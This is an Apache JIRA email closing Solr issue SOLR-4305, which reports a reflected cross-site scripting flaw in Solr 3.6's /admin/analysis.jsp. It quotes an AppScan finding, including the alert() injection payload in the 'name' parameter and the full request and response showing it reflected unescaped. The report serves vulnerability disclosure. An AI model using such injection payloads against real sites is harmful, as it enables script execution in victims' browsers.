[ https://issues.apache.org/jira/browse/SOLR-4305?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]

Jan Høydahl closed SOLR-4305.
-----------------------------
    Resolution: Won't Fix

Closing as won't fix as we do not have JSPs anymore :)

> XSS vulnerability in Solr /admin/analysis.jsp
> ---------------------------------------------
>
>                 Key: SOLR-4305
>                 URL: https://issues.apache.org/jira/browse/SOLR-4305
>             Project: Solr
>          Issue Type: Bug
>          Components: multicore
>    Affects Versions: 3.6
>         Environment: Solaris
>            Reporter: Rob Brooks
>              Labels: security
>
> This issue was found when running solr 3.6 in solaris, in a multicore setup. 
> Each core had a cross site scripting vulnerability found at 
> /admin/analysis.jsp while testing using IBM Rational AppScan 8.5.0.1.
> Here are the details of the scan result as given by IBM Rational AppScan:
> [1 of 1] Cross-Site Scripting
> Severity: High
> Test Type: Application
> Vulnerable URL: https://<server>/solr/<core>/admin/analysis.jsp (Parameter: name)
> CVE ID(s): N/A
> CWE ID(s): 79 (parent of 83)
> Remediation Tasks: Review possible solutions for hazardous character injection
> Variant 1 of 6 [ID=19389]
> The following changes were applied to the original request:
> • Set parameter 'name's value to '" onMouseOver=alert(39846)//'
> Request/Response:
> 12/10/2012 3:33:04 PM 16/187
> POST /solr/<core>/admin/analysis.jsp HTTP/1.1
> Cookie: JSESSIONID=0D77846A894B8BB086394C396F19D0E9
> Content-Length: 96
> Accept: */*
> Accept-Language: en-us
> User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Tablet PC 2.0)
> Host: <server>:8443
> Content-Type: application/x-www-form-urlencoded
> Referer: https://<server>/solr/<core>/admin/analysis.jsp?highlight=on
> nt=type&name=" onMouseOver=alert(39846)//&verbose=on&highlight=on&val=1234&qverbose=on&qval=1234
> HTTP/1.1 200 OK
> Content-Length: 1852
> Server: Apache-Coyote/1.1
> Content-Type: text/html;charset=utf-8
> Date: Mon, 10 Dec 2012 15:54:38 GMT
> <html>
> <head>
> <script>
> var host_name="<server>"
> </script>
> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
> <link rel="stylesheet" type="text/css" href="solr-admin.css">
> <link rel="icon" href="favicon.ico" type="image/ico"></link>
> <link rel="shortcut icon" href="favicon.ico" type="image/ico"></link>
> <title>Solr admin page</title>
> </head>
> <body>
> <a href="."><img border="0" align="right" height="78" width="142"
> src="solr_small.png" alt="Solr"></a>
> <h1>Solr Admin (Cares)
> </h1>
> <server><br/>
> cwd=/export/home/kh SolrHome=/solr/<core>/
> <br/>
> HTTP caching is ON
> <br clear="all">
> <h2>Field Analysis</h2>
> <form method="POST" action="analysis.jsp" accept-charset="UTF-8">
> <table>
> <tr>
> <td>
> <strong>Field
> <select name="nt">
> <option >name</option>
> <option selected="selected">type</option>
> </select></strong>
> </td>
> <td>
> <input class="std" name="name" type="text" value="" onMouseOver=alert(39846)//">
> </td>
> </tr>
> <tr>
> <td>
> <strong>Field value (Index)</strong>
> <br/>
> verbose output
> <input name="verbose" type="checkbox"
> checked="true" >
> <br/>
> highlight matches
> <input name="highlight" type="checkbox"
> checked="true" >
> </td>
> <td>
> <textarea class="std" rows="8" cols="70" name="val">1234</textarea>
> </td>
> </tr>
> <tr>
> <td>
> <strong>Field value (Query)</strong>
> <br/>
> verbose output
> <input name="qverbose" type="checkbox"
> checked="true" >
> </td>
> <td>
> <textarea class="std" rows="1" cols="70" name="qval">1234</textarea>
> </td>
> </tr>
> <tr>
> <td>
> </td>
> <td>
> <input class="stdbutton" type="submit" value="analyze">
> </td>
> </tr>
> </table>
> </form>
> <strong>Unknown Field Type: " onMouseOver=alert(39846)//</strong>
> </body>
> </html>
> Validation In Response:
> • option>
> <option selected="selected">type</option>
> </select></strong>
> </td>
> <td>
> <input class="std" name="name" type="text" value="" onMouseOver=alert(39846)//">
> </td>
> </tr>
> <tr>
> <td>
> <strong>Field value (Index)</strong>
> <br/>
> verbose output
> <inp
> Reasoning:
> The test successfully embedded a script in the response, which will be executed once the user
> activates the OnMouseOver function (i.e., hovers with the mouse cursor over the vulnerable
> control). This means that the application is vulnerable to Cross-Site Scripting attacks.
> CWE ID:
> 83 (child of 79)
> Vulnerable URL: https://<server>/solr/<core>/admin/threaddump.jsp
> Total of 1 security issues in this URL


